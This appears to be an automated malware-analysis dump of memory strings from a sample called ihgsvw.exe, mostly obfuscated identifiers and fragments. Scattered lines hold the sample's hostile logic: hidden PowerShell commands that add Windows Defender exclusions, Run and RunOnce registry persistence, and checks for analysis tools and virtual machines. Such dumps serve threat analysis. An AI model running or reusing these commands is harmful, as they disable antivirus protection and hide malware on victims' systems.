Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d63t
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9db20eebb536a7b25b29de6257c.t
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ed0fcb8f6f59570699cbba617cyt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc0ceea6516a6b1cab98e8327ctt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dd2de8a55d797c31aa90e1327cot
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displaynamezt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") thenut
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("regshot.exe") then
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("taskmgr.exe") then
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: word machine;word numberofsections;dword timedatestamp;dword pointertosymboltable;dword numberofsymbols;,r*
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1_none_2c87ca0024d60201
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)!q/
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 5*20c39e26/304/6/3052_4f0*2_d30_2_d70c2_e///05/75f2d/50920fd43039//e6266e20444f53206d6f64652e0d0d0*24nql
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00@s0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =0;p8
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a;1p>
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a-}pz
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a+epb
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifu
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunch
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f9e720e1x~d
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bf3a765687634b29cd6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: createobject("wscript.shell").run "
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df365189539|
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953(|2
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6'|!
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ev|p
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6e|o
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t|~
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6c|m
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953k
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c8{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d67{1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e&{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6u{_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6d{n
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953s{}
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdir
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ea27f591
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: array
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: runonce6z?
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6qzz
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe7cde|ze
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\rungz`
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\run
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disablesysrestore
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bc2b069
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fe7fde
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f80cd4977c777331a38bd69y
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353$y-
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: runonceoyh
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: arrayslistjys
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startup
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9eb36c2ab69
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdir7x0
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runrx[
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: loop}xf
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: deadline
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mainpe
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef20f3a16f5a7d218d90e33b7c
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dc2be6ac6f6d73369f:g
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hklm64\software\microsoft\windows nt\currentversion\spp\clients%g.
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdir@gi
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disableuac
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exe_c5
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (8xmn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 88mn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6r2f:
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @h5f=
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @h!f)
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3c$f,
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @a]f%
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3cpfx
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: htvf^
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hulft
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: le6(txf@
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \(8hln
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8hln
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (ehnn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h6kes
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \(8xmn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: haei
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (exnn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h2}ee
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it8nn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6eem
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8hln
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (8hln
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3$%d-
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: a"xd
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @?cdk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $88on
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @fyda
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \g$hon
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0x35rdz
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @x(on
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3agdo
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \0x385
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g$hmn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 672c:
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m;5c=
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hd.c6
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2%sc[
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3=vc^
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mwicq
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h qcy
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 67a=
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szkaq
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @laaw
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g~gam
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @bza@
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @?paf
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6oau
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbldr
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6$)`?
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g+c`i
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @mf`l
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3oy`o
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6v|`b
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3,r`x
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @}u`{
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \inik
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: legt
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \ini_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz]o#
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h!4n:
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @m7n=
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @w-n3
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6\n"
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szun[
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\ihgsvw.exe
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktl'm,
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\temp\folder10_51\cdjr.ktlwm|
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user~1\appdata\local\temp\folder~1\cdjr.ktl
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user~1\appdata\local\temp\folder10_51\update.vbswl\
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: const waitonreturn = true
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353version\runonc
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wshshell.run file, hidden, waitonreturn
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: set wshshell = createobject("wscript.shell")0j
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353/j2
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353^j!
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6mjp
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6|jo
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6soft\windows\currentvekj~
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2df5a1406c4b
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6\currentversion\polici
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353i
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba446d62679f?i
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c.i1
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0aa096e333409353]i
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2df5a1406c4bli_
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bf3a765687634b29cd6{in
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd2df5a1406c4bji}
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7cm
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9d82cf4917h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_botkillrh
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6}h
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba446d62649f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9d82cf491
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxservice.exe:
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9ef3bc2b069%
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runonce@
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: program managerk
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc2ff391
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd26e8ba4441
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbox.exeists
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_sandbox_vm(
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9dc2be6ac6f6d73369fs
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d:\espacefree~
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d:\espacefree
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9fd3ae6ba446d62679f
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9cc2ff391;
Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _y0x3856f9c720f4bc51747e0ab698fb3f7c&
